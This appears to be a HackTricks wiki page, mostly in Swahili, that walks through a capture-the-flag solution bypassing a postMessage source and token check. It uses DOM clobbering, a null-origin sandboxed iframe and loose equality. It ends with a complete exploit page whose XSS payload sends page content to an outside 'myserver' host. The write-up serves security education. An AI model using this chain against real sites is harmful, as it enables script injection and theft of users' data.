hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md

Bypassing SOP with Iframes - 2

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Iframes in SOP-2

Katika solution ya challenge, @Strellic_ inapendekeza njia inayofanana na sehemu ya awali. Hebu tuangalie.

Katika changamoto hii, mshambuliaji anahitaji bypass hii:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

Ikiwa atafanya hivyo, anaweza kutuma postmessage yenye maudhui ya HTML ambayo itandikwa kwenye ukurasa kwa kutumia innerHTML bila kusafishwa (XSS).

Njia ya kupita kikaguzi cha kwanza ni kwa kufanya window.calc.contentWindow kuwa undefined na e.source kuwa null:

• window.calc.contentWindow kwa kweli ni document.getElementById("calc"). Unaweza kuharibu document.getElementById kwa kutumia <img name=getElementById /> (zingatia kuwa Sanitizer API -hapa- haijapangwa kulinda dhidi ya mashambulizi ya DOM clobbering katika hali yake ya msingi).
• Kwa hivyo, unaweza kuharibu document.getElementById("calc") kwa kutumia <img name=getElementById /><div id=calc></div>. Kisha, window.calc itakuwa undefined.
• Sasa, tunahitaji e.source kuwa undefined au null (kwa sababu == inatumika badala ya ===, null == undefined ni True). Kupata hii ni "rahisi". Ikiwa unaunda iframe na kutuma postMessage kutoka kwake na mara moja kuondoa iframe, e.origin itakuwa null. Angalia msimbo ufuatao

let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null

Ili kupita ukaguzi wa pili kuhusu token ni kwa kutuma token yenye thamani null na kufanya thamani ya window.token kuwa undefined:

• Kutuma token katika postMessage yenye thamani null ni rahisi.
• window.token katika kuita kazi getCookie ambayo inatumia document.cookie. Kumbuka kwamba ufikiaji wowote wa document.cookie katika kurasa za asili null unachochea makosa. Hii itafanya window.token kuwa na thamani undefined.

Suluhisho la mwisho na @terjanq ni ifuatayo:

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>

{% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}